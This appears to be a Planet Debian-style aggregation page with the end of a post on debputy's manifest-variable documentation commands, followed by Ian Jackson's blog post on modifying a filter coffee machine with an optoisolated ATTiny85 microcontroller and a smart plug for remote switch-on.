Therefore, I made a deliberate choice to reduce the list of shown variables by default and to explicitly list in the output which filters were active. In the current version of debputy (0.1.9), the listing of manifest variables looks something like this:
$ debputy plugin list manifest-variables
+----------------------------------+----------------------------------------+------+-------------+
| Variable (use via: `{{ NAME }}`) | Value                                  | Flag | Provided by |
+----------------------------------+----------------------------------------+------+-------------+
| DEB_HOST_ARCH                    | amd64                                  |      | debputy     |
| [... other DEB_HOST_* vars ...]  | [...]                                  |      | debputy     |
| DEB_HOST_MULTIARCH               | x86_64-linux-gnu                       |      | debputy     |
| DEB_SOURCE                       | debputy                                |      | debputy     |
| DEB_VERSION                      | 0.1.8                                  |      | debputy     |
| DEB_VERSION_EPOCH_UPSTREAM       | 0.1.8                                  |      | debputy     |
| DEB_VERSION_UPSTREAM             | 0.1.8                                  |      | debputy     |
| DEB_VERSION_UPSTREAM_REVISION    | 0.1.8                                  |      | debputy     |
| PACKAGE                          | <package-name>                         |      | debputy     |
| path:BASH_COMPLETION_DIR         | /usr/share/bash-completion/completions |      | debputy     |
+----------------------------------+----------------------------------------+------+-------------+
+-----------------------+--------+-------------------------------------------------------+
| Variable type         | Value  | Option                                                |
+-----------------------+--------+-------------------------------------------------------+
| Token variables       | hidden | --show-token-variables OR --show-all-variables        |
| Special use variables | hidden | --show-special-case-variables OR --show-all-variables |
+-----------------------+--------+-------------------------------------------------------+

I will probably tweak the concrete listing in the future. Personally, I am considering providing short-hand variables for some of the DEB_HOST_* variables and then hiding the DEB_HOST_* group from the default view as well. Maybe something like ARCH and MULTIARCH, which would default to their DEB_HOST_* counterparts. These variables could then have extended documentation that highlights DEB_HOST_<X> as their source and notes that there are special cases for cross-building where you might need DEB_BUILD_<X> or DEB_TARGET_<X>.
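As a minimal sketch of where such variables typically end up, an install rule can reference them via the `{{ NAME }}` syntax shown in the table header. The snippet below is my own illustration (the paths are made up), not an excerpt from the post:

# Sketch only; paths are hypothetical
installations:
  - install:
      source: build/libfoo.so.1.0.0
      # DEB_HOST_MULTIARCH expands to the multiarch tuple, e.g. x86_64-linux-gnu
      dest-dir: usr/lib/{{DEB_HOST_MULTIARCH}}
  - install:
      source: completions/foo.bash
      # path:BASH_COMPLETION_DIR resolves to /usr/share/bash-completion/completions;
      # quoted because a YAML value starting with "{" would otherwise be read as a mapping
      as: "{{path:BASH_COMPLETION_DIR}}/foo"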
Speaking of variable documentation, you can also look up the documentation for a given manifest variable:
$ debputy plugin show manifest-variables path:BASH_COMPLETION_DIR
Variable: path:BASH_COMPLETION_DIR
==================================
Documentation: Directory to install bash completions into
Resolved: /usr/share/bash-completion/completions
Plugin: debputy

This was my update on online reference documentation for debputy. I hope you found it useful. :)
Thanks

On a closing note, I would like to thank Jochen Sprickerhof, Andres Salomon, and Paul Gevers for their recent contributions to debputy. Jochen and Paul provided a number of real-world cases where debputy would crash or not work, which have now been fixed. Andres and Paul also provided corrections to the documentation.
Ian Jackson: Hacking my filter coffee machine
I hacked my coffee machine to let me turn it on from upstairs in bed :-). Read on for explanation, circuit diagrams, 3D models, firmware source code, and pictures.
- Background: the Morphy Richards filter coffee machine
- Planning
- Inside the Morphy Richards filter coffee machine
- Unexpected electrical hazard
- Design approach
- Implementation - hardware
- Implementation - software
- Results
- Epilogue
- Bonus pictures
I have a Morphy Richards filter coffee machine. It makes very good coffee. But the display and firmware are quite annoying:
After it has finished making the coffee, it will keep the coffee warm using its hotplate, but only for 25 minutes. If you want to make a batch and drink it over the course of the morning that’s far too short.
It has a timer function. But it only has a 12-hour clock! You can’t retire upstairs on a Friday night, having programmed the coffee machine to make you coffee at a suitable post-lie-in time. If you try, you are greeted with apparently-inexplicably-cold coffee.
The buttons and UI are very confusing. For example, if it’s just sitting there keeping the coffee warm, and you pour the last of the coffee, you want to turn it off. So you press the power button. Then the display lights up as if you’ve just turned it on! (The power LED is in the power button, which your finger is on.) If you know this you can get used to it, but it can confuse guests.
Also, I’m lazy and wanted to be able to cause coffee to exist from upstairs in bed, without having to make a special trip down just to turn the machine on.
Planning

My original feeling was “I can’t be bothered dealing with the coffee machine innards” so I thought I would make a mechanical contraption to physically press the coffee machine’s “on” button.
I could have my contraption press the button to turn the machine on (timed, or triggered remotely), and then periodically in pairs to reset the 25-minute keep-warm timer.
But a friend pointed me at a blog post by Andy Bradford, where Andy recounts modifying his coffee machine, adding an ESP8266 and connecting it to his MQTT-based Home Assistant setup.
I looked at the pictures and they looked very similar to my machine. I decided to take a look inside.
Inside the Morphy Richards filter coffee machine

My coffee machine seemed to be very similar to Andy’s. His disassembly report was very helpful. Inside I found the high-voltage parts with the heating elements, and the front panel with the display and buttons.
I spent a while poking about, measuring things, and so on.
Unexpected electrical hazard

At one point I wanted to use my storage oscilloscope to capture the duration and amplitude of the “beep” signal. I needed to connect the ’scope ground to the UI board’s ground plane, but then when I switched the coffee machine on at the wall socket, it tripped the house’s RCD.
It turns out that the “low voltage” UI board is coupled to the mains. In my setting, there’s an offset of about 8V between the UI board ground plane, and true earth. (In my house the neutral is about 2-3V away from true earth.)
This alarmed me rather. To me, it meant that my modifications needed to keep everything connected to the UI board properly electrically isolated from anything external to the coffee machine’s housing.
In Andy’s design, I think the internal UI board ground plane is directly brought out to an external USB-A connector. This means that if there were a neutral fault, the USB-A connector would be at live potential, possibly creating an electrocution or fire hazard. I made a comment in Andy Bradford’s blog, reporting this issue, but it doesn’t seem to have appeared. This is all quite alarming. I hope Andy is OK!
Design approach

I don’t have an MQTT setup at home, or an installation of Home Assistant. I didn’t feel like adding a lot of complicated software to my life, if I could avoid it. Nor did I feel like writing a web UI myself. I’ve done that before, but I’m lazy and in this case my requirements were quite modest.
Also, the need for electrical isolation would further complicate any attempt to do something sophisticated (that could, for example, sense the state of the coffee machine).
I already had a Tasmota-based cloud-free smart plug, which controls the fairy lights on our gazebo. We just operate that through its web UI. So, I decided I would add a small and stupid microcontroller. The microcontroller would be powered via a smart plug and an off-the-shelf USB power supply.
The microcontroller would have no inputs. It would simply simulate an “on” button press once at startup, and thereafter two presses every 24 minutes. After the 4th double press, the microcontroller would stop, leaving the coffee machine to time out by itself, after a total period of about 2h.
Implementation - hardware

I used a DigiSpark board with an ATTiny85. One of the GPIOs is connected to an optoisolator, whose output transistor is wired across the UI board’s “on” button.
(Click through for circuit diagram scans as PDFs.)
The DigiSpark has just a USB tongue, which is very wobbly in a normal USB socket. I designed a 3D-printed case which also had an approximation of the rest of the USB-A plug. The plug is out of spec; our printer won’t go fine enough - and anyway, the shield is supposed to be metal, not fragile plastic. But it fitted into the USB PSU I was using, satisfactorily if a bit stiffly, and also into the connector for programming via my laptop.
Inside the coffee machine, there’s a boundary between the original, mains-coupled UI board and the isolated low-voltage side with the microcontroller. I used a reasonably substantial cable to bring out the low-voltage connection, past all the other hazardous innards, to make sure it stays isolated.
I added a “drain power supply” resistor on another of the GPIOs. This is enabled, with a draw of about 30mA, when the microcontroller is soon going to “off”/“on” cycle the coffee machine. That reduces the risk that the user turns off the smart plug (and with it the machine), only for the microcontroller to turn the coffee machine back on again using the remaining power from the USB PSU. Empirically, in my setup it reduces the time from “smart plug off” to “microcontroller stops” from about 2-3s to more like 1s.
Optoisolator board (inside coffee machine) pictures

(Click through for full size images.)
Microcontroller board (in USB-plug-ish housing) pictures

Implementation - software

I originally used the Arduino IDE, writing my program in C. I had a bad time with that and rewrote it in Rust.
The firmware is in a repository on Debian’s GitLab.
Results

I can now cause the coffee to start, from my phone. It can be programmed more than 12h in advance. And it stays warm until we’ve drunk it.
UI is worse

There’s one aspect of the original Morphy Richards machine that I haven’t improved: the user interface is still poor. Indeed, it’s now even worse:
To turn the machine on, you probably want to turn on the smart plug instead. Unhappily, the power button for that is invisible in its installed location.
In particular, in the usual case, if you want to turn it off, you should ideally turn off both the smart plug (which can be done with the button on it) and the coffee machine itself. If you forget to turn off the smart plug, the machine can end up being turned on, very briefly, a handful of times, over the next hour or two.
Epilogue

We had used the new features a handful of times when one morning the coffee machine just wouldn’t make coffee. The UI showed it turning on, but it wouldn’t get hot, so no coffee. I thought “oh no, I’ve broken it!”
But, on investigation, I found that the machine’s heating element was open circuit (i.e., completely broken). I didn’t mess with that part. So, hooray! Not my fault. Probably, just being inverted a number of times and generally lightly jostled had precipitated a latent fault. The machine was a number of years old.
Happily, I found an identical replacement machine online. I’ve transplanted my modification and now it all works well.
Bonus pictures

(Click through for full size images.)
edited 2023-11-26 14:59 UTC in an attempt to fix TOC links